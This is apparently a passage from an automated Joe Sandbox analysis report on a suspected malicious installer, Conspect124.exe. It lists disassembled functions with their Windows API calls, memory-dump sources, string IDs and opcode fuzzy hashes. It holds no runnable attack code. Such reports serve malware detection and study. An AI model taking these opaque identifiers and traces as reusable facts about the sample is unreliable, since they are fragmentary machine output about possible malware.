                                      • lstrcatW.KERNEL32(?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EAC
                                      • lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EB3
                                      • lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EC8
                                      • lstrcatW.KERNEL32(?,23BC10DF,?,23BC10DF,?,?,?,00000000), ref: 23BC1ED3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat
                                      • String ID:
                                      • API String ID: 493641738-0
                                      • Opcode ID: 7439acb54f4d9d5e67dab8598c6236961099588f3567080407b4e11de4c8f56b
                                      • Instruction ID: 42ea2cf3d9d85daf408ccdce36c4f92acd1f152452626494257ee85709837737
                                      • Opcode Fuzzy Hash: 7439acb54f4d9d5e67dab8598c6236961099588f3567080407b4e11de4c8f56b
                                      • Instruction Fuzzy Hash: 14F0E9261002147ED7317B19AC95E7F777CEFDAA20F04081EF60C931909B54684282B5
                                      APIs
                                      • _free.LIBCMT ref: 23BC91D0
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC91E2
                                      • _free.LIBCMT ref: 23BC91F4
                                      • _free.LIBCMT ref: 23BC9206
                                      • _free.LIBCMT ref: 23BC9218
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 78e420097c5488cdc91c44fa4e6d8a04a99bf2440cd06a940f9f3fbbf5471ee1
                                      • Instruction ID: faac9a2125dd0c0d43d35f154f66b7d2135ec449e8c8ce8eeb24ab861aae304e
                                      • Opcode Fuzzy Hash: 78e420097c5488cdc91c44fa4e6d8a04a99bf2440cd06a940f9f3fbbf5471ee1
                                      • Instruction Fuzzy Hash: 0CF04F716146C4AFD630EF59D6C5D067BF9EF286107540CA6E94DDB901CA34F8908A54
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                      • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                      • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                      • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                      APIs
                                      • _free.LIBCMT ref: 23BC536F
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC5381
                                      • _free.LIBCMT ref: 23BC5394
                                      • _free.LIBCMT ref: 23BC53A5
                                      • _free.LIBCMT ref: 23BC53B6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 9e5afa12b39b7a83b922c4a6ef2c70dbd19b5ab297d5b317b57d56825376b458
                                      • Instruction ID: 9eb2e8a0daf7b7b27fc5b4920cac599aa4a24962ec31ab3712b8049aaa369604
                                      • Opcode Fuzzy Hash: 9e5afa12b39b7a83b922c4a6ef2c70dbd19b5ab297d5b317b57d56825376b458
                                      • Instruction Fuzzy Hash: 4FF0BBB091026CDFC625FF2687604093FB5FF39A143050697F81C97612DB7885618B80
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Conspect124.exe,00000104), ref: 23BC4C1D
                                      • _free.LIBCMT ref: 23BC4CE8
                                      • _free.LIBCMT ref: 23BC4CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                      • API String ID: 2506810119-1799583490
                                      • Opcode ID: f343b8d06a47ded78f6934ef829f20e748ef2baf397ba780765485eb4bb15aa9
                                      • Instruction ID: df625b2140f3de3059c94e36df30e6811717df97cc54af660d7e46f66f9a7e75
                                      • Opcode Fuzzy Hash: f343b8d06a47ded78f6934ef829f20e748ef2baf397ba780765485eb4bb15aa9
                                      • Instruction Fuzzy Hash: B6311E71B00398AFD732DF998980D9FBBB8EB99710F1444B6E90497221D6758F41CB50
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                      • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23BC6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 23BC8731
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 23BC87BA
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 23BC87CC
                                      • __freea.LIBCMT ref: 23BC87D5
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: c8e60b3d7cb76b5faf6224ed4b5f4b334bc2d744aa35824a2cd2023d5a5afbeb
                                      • Instruction ID: 6eb182ed157a26209349c01cd130beeb6b0ccdf647f1cdcb93cbd4fbf41dc9c7
                                      • Opcode Fuzzy Hash: c8e60b3d7cb76b5faf6224ed4b5f4b334bc2d744aa35824a2cd2023d5a5afbeb
                                      • Instruction Fuzzy Hash: 1B319C32A0129AAFDF35DF65CC80EAF7BA6EB54610F0509BAED04DB160E735D950CB90
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Close$Enum
                                      • String ID:
                                      • API String ID: 464197530-0
                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23BC1D66,00000000,00000000,?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue), ref: 23BC5D13
                                      • GetLastError.KERNEL32(?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue,23BCE190,FlsSetValue,00000000,00000364,?,23BC5BC8), ref: 23BC5D1F
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue,23BCE190,FlsSetValue,00000000), ref: 23BC5D2D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 2f526f5665f61dc4e4bf2d230a1ed2a93847ad8eda551d9d677324faeead1fc9
                                      • Instruction ID: 5f831e06b2bc9280ee5bf921715acdfb5f761e0a0a565e9759d66f583f1c60f0
                                      • Opcode Fuzzy Hash: 2f526f5665f61dc4e4bf2d230a1ed2a93847ad8eda551d9d677324faeead1fc9
                                      • Instruction Fuzzy Hash: 5D01D8367113666FC331AE6A8C68E467758EF456A1F140E76F909D7541D724D801C6E0
                                      APIs
                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                      • GetLastError.KERNEL32 ref: 004057D6
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                      • GetLastError.KERNEL32 ref: 004057F5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID:
                                      • API String ID: 3449924974-0
                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                      APIs
                                      • DestroyWindow.USER32(?,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                      • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: : $Se.
                                      • API String ID: 4218353326-4089948878
                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction ID: 843643f636dea84d50bd98d50b14d6c5707db49d646f9a930a0a08cd90b5d875
                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction Fuzzy Hash: 83110AB5A00388AECB21DFACD840BDDFBFCEF29204F5444A6E545E7212E6705B02C765
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23BC2903
                                        • Part of subcall function 23BC35D2: RaiseException.KERNEL32(?,?,?,23BC2925,00000000,00000000,00000000,?,?,?,?,?,23BC2925,?,23BD21B8), ref: 23BC3632
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23BC2920
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                       • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                       • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: a4aabe0a7d5fe7ad58c14d681b6302348a9b93667140110b1e22bdb04063d45f
                                      • Instruction ID: 0c995c4a4423faba0367bc929b19e39f2cde8215bf146f9922aff4de5c85dc9b
                                      • Opcode Fuzzy Hash: a4aabe0a7d5fe7ad58c14d681b6302348a9b93667140110b1e22bdb04063d45f
                                      • Instruction Fuzzy Hash: 24F0A434E1038C7FCF34FEA4EC44959776CAF14A50F904DF1AA249E0A1EB71EA158595
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00405253
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                      • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405D8B
                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,74DF3420,00403589), ref: 00405DA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                      • CloseHandle.KERNEL32(?), ref: 00405867
                                      Strings
                                      • Error launching installer, xrefs: 00405844
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                      • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                      • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                      • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
